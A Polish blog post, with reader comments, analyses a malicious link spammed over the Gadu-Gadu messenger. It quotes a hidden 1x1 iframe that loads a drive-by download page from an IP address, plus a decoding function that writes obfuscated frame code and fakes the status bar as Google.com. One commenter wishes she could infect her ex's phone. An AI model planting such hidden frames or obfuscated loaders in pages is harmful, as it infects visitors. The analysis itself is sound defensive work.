No tak… doszło do tego, że siedzę w niedzielę i bawię się w rozgrzebywanie kodu wirusów.
Jeden z moich znajomych powiedział mi, że ten link prowadzi do wirusa, a pewna osoba podająca się jako Marta spamuje nim poprzez gadu (numer 9523477, możliwe też, że 9512753 i 7778035, chociaż mnie nie wysłano linka). Nie miałem nic do roboty, wiec zacząłem sprawdzać jak to działa.
Sama strona nie korzysta z jakiegoś bardzo oryginalnego sposobu – używa <iframe>.
Kod ładujący kolejną stronę:
<iframe src="http://85.255.113.4/dl/adv435.php" width=1 height=1>
Po wejściu na następną stronę w dole przeglądarki (Firefox) pokazuje się informacja o ładowaniu apletu. Zaglądając w źródło możemy dostrzec długaśny ciąg tekstowy zaszyfrowany w dość prosty sposób. Otóż znajduje się tam deklaracja funkcji przepuszczona poprzez escape() i faktyczny kod ramki zaszyfrowany przez tą funkcję.
Po krótkiej zabawie udało mi się rozkodować funkcję:
function dF(s)
{
var s1 = unescape(s.substr(0, s.length - 1));
var t='';
for(i=0; i<s1.length; i++) {
t += String.fromCharCode(s1.charCodeAt(i) - s.substr(s.length - 1,1));
}
document.write(unescape(t));
self.focus();
setInterval("window.status='Google.com'",7);
}
Wystarczyło teraz zmienić < na < aby wyświetlić kod strony w przeglądarce.
Wydaje mi się, że w tym miejscu znajduje się pięć potencjalnych zagrożeń – kursor o nazwie sploit.anr, obiekt x2, obiekt x3, aplet loaderadv435.jar oraz obiekt x.chm. Nie jestem jednak MVP i nie znam się aż tak głęboko na dziurach w Windows. Dlatego skończę w tym miejscu. Jeśli czegoś się dowiem, to dopiszę.
taaaa….a mlodziez nei uczy sie, tylko zajmuej sie glupotami….
i co z tej Polski ma byc skoro taka mlodziez leniwa mamy…:(
😀
/me, ktoremu ciagle jabber nie hula, zmuszony uzywac GG dostal dzis trzy takie Marty.
/me, ktory dostep do sieci ma tylko przez maszyny na Windows obecnie, otworzyl ta strone, z ciekawosci, w Operze oczywiscie.
Nic sie nie stalo.
rozbit: Coś trzeba robić. ;]
piko: Połowa kodu jest na pewno jedynie pod MSIE, zastanawiałem się za to, czy druga również.
a ja chetnie wprowadzilabym jednej osobie wirusa do tel.ciagle mnie obraza tylko dlatego ze z nim zerwalam moze wtedy przestalabym dostawac te obrazliwe esy i moglabym spokojnie spac…zaluje ze nie potrafie tego zrobic….